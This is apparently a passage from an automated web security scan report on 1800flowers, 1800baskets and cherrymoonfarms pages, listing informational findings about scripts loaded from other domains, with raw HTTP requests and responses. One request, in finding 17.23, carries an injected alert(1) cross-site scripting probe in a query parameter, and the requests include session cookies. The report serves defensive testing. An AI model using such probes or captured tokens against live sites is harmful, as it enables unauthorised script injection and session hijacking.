Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:26 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000elBrn4hw6Blclz2pBq53Rgi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 146143


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<body onload='setDeliveryDates()'>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...

17.16. http://ww30.1800baskets.com/template.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dNGqKXu-V4E9FonaYphG7gq:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37878


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- pageid END -->


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...

17.17. http://ww30.1800flowers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:38 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: FSESSIONID=2f6aa588e33f44c3bb0191955def6935; Path=/; Domain=1800flowers.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800flowers.com
Set-Cookie: ShopperManagerEnterprise=41db6fdb-b7c6-458a-b4c5-a2060d927f3c; Expires=Thu, 06-May-21 01:00:38 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63361


<html>

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<!--MSN--><meta name="msvalidate.01" content="7372219C2822
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

17.18. http://ww30.1800flowers.com/collection.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:11 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qD3wSlEaCI6fvlpmlKhLnKM:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 73822


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

17.19. http://ww30.1800flowers.com/product.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /product.do?baseCode=91637&dataset=10305&cm_cid=d10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.3.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902894375&t2=1304902899114&t3=1304902906957&t4=1304902893038&lti=1304902906957&ln=&hr=/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&fti=&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3B&ac=&fd=&uer=&fu=&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:07:59 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 88969


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript">
</script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

17.20. http://ww30.1800flowers.com/shoppingbasket.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:22 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000GsjYiBW6hk4zCZT985cxiBR:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 62042


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

17.21. https://ww30.1800flowers.com/checkoutsignin.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<body >
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="https://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


<script language="javascript1.1" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...

17.22. https://ww30.1800flowers.com/continueasguest.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /continueasguest.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1
Content-Length: 9

x=74&y=15

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XbGXHrF9nwuNJodRv3iY_Xi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 1142175


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<body onscroll='bodyScroll()'>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/redesign/redesign_common_apr1.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="https://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


<script language="javascript1.1" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...

17.23. http://www.cherrymoonfarms.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<link rel="canonical" href="http://www.cherrymoonfarms.com/" /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="mainContainer" style="margin-bottom:5px;">
           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="SearchHolder">
